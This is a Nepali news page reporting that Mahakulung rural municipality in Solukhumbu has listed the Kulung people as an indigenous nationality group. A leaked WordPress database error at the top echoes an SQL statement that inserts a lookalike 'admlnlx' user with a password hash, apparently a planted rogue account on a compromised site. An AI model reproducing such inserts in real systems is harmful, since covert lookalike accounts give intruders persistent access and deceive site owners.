WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BwhZ/zXx15WNfHjhYmfzS6fW.QoqRH0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 09:33:51', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । सोलुखुम्बु जिल्लाको महाकुलुङ गाउपालिकाले कुलुङ जातिलाई आदिबासी जनजाति समूहमा सूचिकृत गर्ने निर्णय गरेको छ ।
सरकारले अल्पसंख्यक जातिय समूहमा राखेको कुलुङ जातिलाई महाकुलुङ गाउपालिकाको शुक्रबार बसेको कार्यपालिका बैठकबाट आदिबासी जनजाति समूहमा सूचिकृत गर्ने निर्णय गरेको हो ।
महाकुलुङ गाउपालिकाको कार्यलयमा बसेको बैठकले सर्वसम्मत रुपमा सुचिकृत गर्ने निर्णय गरेको गाउपालिका अध्यक्ष सुर्यबहादुर कुलुङले बताए । यसअघि विभिन्न फोरममा कुलुङलाई अल्पसंख्यक समूहबाट हटाएर आदिबासी जनजातिमा सूचिकृत गर्नुपर्ने आवाज उठ्दै आएको थियो । कुलुङ संघ सोलुखुम्बुका अध्यक्ष केडी कुलुङले पालिकामा पेश गरेको निवेदनको आधारमा सूचिकृतको प्रक्रिया अघि बढेको अध्यक्ष कुलुङले जनाए ।
नेपालको संविधानले स्थानिय सरकारलाई दिएको अधिकार प्रयोग गरि मापदण्ड पुरा गरेर जनजाति समूहमा सुचिकृत गरिएको र पालिकाबाट सुरु भएको सूचिकृतको काम प्रदेश र केन्द्र सरकारको सूचिमा पनि संशोधनका लागि पालिकाले नेतृत्व लिने अध्यक्ष कुलुङको बताए ।